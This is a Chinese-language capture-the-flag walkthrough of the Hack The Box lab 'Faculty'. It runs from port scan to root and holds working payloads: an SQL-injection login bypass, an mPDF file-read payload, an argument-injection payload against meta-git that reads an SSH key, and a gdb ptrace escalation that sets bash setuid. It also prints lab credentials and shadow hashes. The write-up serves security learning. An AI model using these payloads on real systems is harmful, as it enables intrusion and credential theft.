基本信息

https://www.hackthebox.com/home/machines/profile/480
10.10.11.169

端口扫描

22和80:

$ nmap -sC -sV 10.10.11.169
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-09 11:58 CST
Nmap scan report for 10.10.11.169
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e9:41:8c:e5:54:4d:6f:14:98:76:16:e7:29:2d:02:16 (RSA)
|   256 43:75:10:3e:cb:78:e9:52:0e:eb:cf:7f:fd:f6:6d:3d (ECDSA)
|_  256 c1:1c:af:76:2b:56:e8:b3:b8:8a:e9:69:73:7b:e6:f5 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://faculty.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.84 seconds

80

需要加host：

1	10.10.11.169 faculty.htb

admin

直接查看源码或者扫描目录可以发现admin目录：

sql注入

基础sql注入：

1	admin' or 1=1 #

pdf

页面上存在下载pdf的功能,发现是两次url，一次base64编码的内容使用mpdf生成的pdf文件：

mpdf LFI

搜索可以找到利用mpdf读取文件的方式：

Make annotation tags disabled by default · Issue #356 · mpdf/mpdf
https://github.com/mpdf/mpdf/issues/356

利用这个方式去生成新pdf读文件，读取的文件在生成的pdf文件的附件中，firefox可以直接看到然后下载：

https://gchq.github.io/CyberChef/#recipe=URL_Encode(false)URL_Encode(false)To_Base64('A-Za-z0-9%2B/%3D')&input=PGFubm90YXRpb24gZmlsZT0iL2V0Yy9wYXNzd2QiIGNvbnRlbnQ9Ii9ldGMvcGFzc3dkIiBpY29uPSJHcmFwaCIgdGl0bGU9IkF0dGFjaGVkIEZpbGU6IC9ldGMvcGFzc3dkIiBwb3MteD0iMTk1IiAvPg

curl http://faculty.htb/mpdf/tmp/OK5zAnWj3DI9qFyfX0ixEwMC7h.pdf --output 1.pdf

$ cat passwd | grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
gbyolo:x:1000:1000:gbyolo:/home/gbyolo:/bin/bash
developer:x:1001:1002:,,,:/home/developer:/bin/bash

后续就是一步步读文件：

根据报错信息获取到php文件名和路径，去读取源码，一步步继续，最终得到密码：

/var/www/scheduling/admin/admin_class.php
include 'db_connect.php';

<?php
$conn= new mysqli('localhost','sched','Co.met06aci.dly53ro.per','scheduling_db')or die("Could not connect to mysql".mysqli_error($con));

gbyolo

得到的密码可以ssh登录gbyolo用户,下一步是通过meta-git到developer：

1 2	ssh gbyolo@10.10.11.169 Co.met06aci.dly53ro.per

搜索可以发现相关漏洞：

728040 [meta-git] RCE via insecure command formatting

https://hackerone.com/reports/728040

读取developer的私钥：

1 2	sudo -u developer meta-git clone 'miao \|\| whoami' sudo -u developer meta-git clone 'miao \|\| cat ~/.ssh/id_rsa'

developer_id_rsa

user flag

ssh登录，获得user flag，并且发现当前用户在debug组中

提权信息

debug组那就一般是gdb，发现gdb也有ptrace权限：

大概流程就是gdb attach到root进程上，然后就可以以root权限调用可用的函数，这里存在root运行python3，所以可以直接使用system函数执行任意命令

提权 & root flag

找出root运行的python3的PID，gdb attach，调用函数执行命令

1
2
3

export PID=$(ps aux | grep "^root.*python3" | awk '{print $2}')
gdb -p $PID
call (void)system("chmod u+s /bin/bash")

shadow

root:$6$CiEa.wxtUKxG5q21$ED3MTE6ehz0j0q4kRQfK4bnLQFLZDrG9skIPsc0p2/X3JSBHFWjRWAZwEdUpqON6UqZOXvme7.1wHzNCVHqk9/:18559:0:99999:7:::
gbyolo:$6$ccGHy1FmLiRRtdRO$8YUhXxCWlUNP7/VSch6vqb3aEMs4j/ncGyPCObyl9rS8C/ZDiC4.NOXAb0B1cuMir0ilQK.IDWFjDEryXV5fx1:19165:0:99999:7:::
postfix:*:18559:0:99999:7:::
developer:$6$oY/UDfRNf0UfWpGG$PUFSZoqX4AM1igh7RFTCLRnbs4Qi19jdqOMeZWBIwnkVS//6iyRbNaY/ZFcNoCFDMfdgAlnA4C7EiPRV9Ayvc.:18559:0:99999:7:::
usbmux:*:19164:0:99999:7:::

参考资料

Make annotation tags disabled by default · Issue #356 · mpdf/mpdf
https://github.com/mpdf/mpdf/issues/356
728040 [meta-git] RCE via insecure command formatting

https://hackerone.com/reports/728040
Faculty HTB - [DISCUSSION] | BreachForums
https://breached.to/Thread-Faculty-HTB-DISCUSSION
Writeup Faculty HackTheBox
https://gatogamer1155.github.io/hackthebox/faculty/

Faculty - HackTheBox

2022-07-09